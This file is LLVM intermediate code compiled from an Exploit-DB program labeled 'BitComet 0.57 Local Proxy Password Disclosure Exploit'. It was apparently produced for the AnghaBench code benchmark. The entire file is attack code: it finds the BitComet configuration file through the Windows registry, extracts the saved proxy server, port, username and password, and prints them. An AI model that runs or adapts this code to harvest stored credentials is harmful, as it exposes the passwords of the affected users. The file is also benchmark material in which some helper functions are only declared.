; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_937.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_937.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@HKEY_LOCAL_MACHINE = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [42 x i8] c"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\00", align 1
@KEY_QUERY_VALUE = common dso_local global i32 0, align 4
@hKey = common dso_local global i32 0, align 4
@ERROR_SUCCESS = common dso_local global i64 0, align 8
@.str.1 = private unnamed_addr constant [16 x i8] c"ProgramFilesDir\00", align 1
@prgfiles = common dso_local global i64 0, align 8
@dwBufLen = common dso_local global i64 0, align 8
@lRet = common dso_local global i64 0, align 8
@BUFSIZE = common dso_local global i64 0, align 8
@.str.2 = private unnamed_addr constant [19 x i8] c"An error occured!\0A\00", align 1
@.str.3 = private unnamed_addr constant [23 x i8] c"\\BitComet\\BitComet.xml\00", align 1
@.str.4 = private unnamed_addr constant [64 x i8] c"BitComet 0.57 Local Proxy Password Disclosure Exploit by Kozan\0A\00", align 1
@.str.5 = private unnamed_addr constant [19 x i8] c"Credits to ATmaCA\0A\00", align 1
@.str.6 = private unnamed_addr constant [47 x i8] c"www.netmagister.com - www.spyinstructors.com \0A\00", align 1
@.str.7 = private unnamed_addr constant [25 x i8] c"kozan@netmagister.com \0A\0A\00", align 1
@.str.8 = private unnamed_addr constant [14 x i8] c"<ProxyServer>\00", align 1
@.str.9 = private unnamed_addr constant [12 x i8] c"<ProxyPort>\00", align 1
@.str.10 = private unnamed_addr constant [16 x i8] c"<ProxyUsername>\00", align 1
@.str.11 = private unnamed_addr constant [16 x i8] c"<ProxyPassword>\00", align 1
@.str.12 = private unnamed_addr constant [20 x i8] c"Proxy Address : %s\0A\00", align 1
@.str.13 = private unnamed_addr constant [17 x i8] c"Proxy Port : %s\0A\00", align 1
@.str.14 = private unnamed_addr constant [21 x i8] c"Proxy Username : %s\0A\00", align 1
@.str.15 = private unnamed_addr constant [21 x i8] c"Proxy Password : %s\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i8*, align 8
  %3 = alloca i64, align 8
  %4 = alloca i64, align 8
  %5 = alloca i64, align 8
  %6 = alloca i64, align 8
  store i32 0, i32* %1, align 4
  %7 = load i32, i32* @HKEY_LOCAL_MACHINE, align 4
  %8 = load i32, i32* @KEY_QUERY_VALUE, align 4
  %9 = call i64 @RegOpenKeyEx(i32 %7, i8* getelementptr inbounds ([42 x i8], [42 x i8]* @.str, i64 0, i64 0), i32 0, i32 %8, i32* @hKey)
  %10 = load i64, i64* @ERROR_SUCCESS, align 8
  %11 = icmp eq i64 %9, %10
  br i1 %11, label %12, label %32

12:                                               ; preds = %0
  %13 = load i32, i32* @hKey, align 4
  %14 = load i64, i64* @prgfiles, align 8
  %15 = trunc i64 %14 to i32
  %16 = call i64 @RegQueryValueEx(i32 %13, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.1, i64 0, i64 0), i32* null, i32* null, i32 %15, i64* @dwBufLen)
  store i64 %16, i64* @lRet, align 8
  %17 = load i64, i64* @lRet, align 8
  %18 = load i64, i64* @ERROR_SUCCESS, align 8
  %19 = icmp ne i64 %17, %18
  br i1 %19, label %24, label %20

20:                                               ; preds = %12
  %21 = load i64, i64* @dwBufLen, align 8
  %22 = load i64, i64* @BUFSIZE, align 8
  %23 = icmp sgt i64 %21, %22
  br i1 %23, label %24, label %29

24:                                               ; preds = %20, %12
  %25 = load i32, i32* @hKey, align 4
  %26 = call i32 @RegCloseKey(i32 %25)
  %27 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.2, i64 0, i64 0))
  %28 = call i32 @exit(i32 1) #4
  unreachable

29:                                               ; preds = %20
  %30 = load i32, i32* @hKey, align 4
  %31 = call i32 @RegCloseKey(i32 %30)
  br label %37

32:                                               ; preds = %0
  %33 = load i32, i32* @hKey, align 4
  %34 = call i32 @RegCloseKey(i32 %33)
  %35 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.2, i64 0, i64 0))
  %36 = call i32 @exit(i32 1) #4
  unreachable

37:                                               ; preds = %29
  %38 = load i64, i64* @prgfiles, align 8
  %39 = call i32 @strcat(i64 %38, i8* getelementptr inbounds ([23 x i8], [23 x i8]* @.str.3, i64 0, i64 0))
  %40 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([64 x i8], [64 x i8]* @.str.4, i64 0, i64 0))
  %41 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([19 x i8], [19 x i8]* @.str.5, i64 0, i64 0))
  %42 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([47 x i8], [47 x i8]* @.str.6, i64 0, i64 0))
  %43 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([25 x i8], [25 x i8]* @.str.7, i64 0, i64 0))
  %44 = load i64, i64* @BUFSIZE, align 8
  %45 = call i8* @llvm.stacksave()
  store i8* %45, i8** %2, align 8
  %46 = alloca i8, i64 %44, align 16
  store i64 %44, i64* %3, align 8
  %47 = load i64, i64* @BUFSIZE, align 8
  %48 = alloca i8, i64 %47, align 16
  store i64 %47, i64* %4, align 8
  %49 = load i64, i64* @BUFSIZE, align 8
  %50 = alloca i8, i64 %49, align 16
  store i64 %49, i64* %5, align 8
  %51 = load i64, i64* @BUFSIZE, align 8
  %52 = alloca i8, i64 %51, align 16
  store i64 %51, i64* %6, align 8
  %53 = load i64, i64* @prgfiles, align 8
  %54 = call i32 @oku(i64 %53, i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.8, i64 0, i64 0))
  %55 = call i32 @strcpy(i8* %46, i32 %54)
  %56 = load i64, i64* @prgfiles, align 8
  %57 = call i32 @oku(i64 %56, i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.9, i64 0, i64 0))
  %58 = call i32 @strcpy(i8* %48, i32 %57)
  %59 = load i64, i64* @prgfiles, align 8
  %60 = call i32 @oku(i64 %59, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.10, i64 0, i64 0))
  %61 = call i32 @strcpy(i8* %50, i32 %60)
  %62 = load i64, i64* @prgfiles, align 8
  %63 = call i32 @oku(i64 %62, i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.11, i64 0, i64 0))
  %64 = call i32 @strcpy(i8* %52, i32 %63)
  %65 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.12, i64 0, i64 0), i8* %46)
  %66 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.13, i64 0, i64 0), i8* %48)
  %67 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.14, i64 0, i64 0), i8* %50)
  %68 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.15, i64 0, i64 0), i8* %52)
  store i32 0, i32* %1, align 4
  %69 = load i8*, i8** %2, align 8
  call void @llvm.stackrestore(i8* %69)
  %70 = load i32, i32* %1, align 4
  ret i32 %70
}

declare dso_local i64 @RegOpenKeyEx(i32, i8*, i32, i32, i32*) #1

declare dso_local i64 @RegQueryValueEx(i32, i8*, i32*, i32*, i32, i64*) #1

declare dso_local i32 @RegCloseKey(i32) #1

declare dso_local i32 @printf(i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @strcat(i64, i8*) #1

; Function Attrs: nounwind
declare i8* @llvm.stacksave() #3

declare dso_local i32 @strcpy(i8*, i32) #1

declare dso_local i32 @oku(i64, i8*) #1

; Function Attrs: nounwind
declare void @llvm.stackrestore(i8*) #3


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
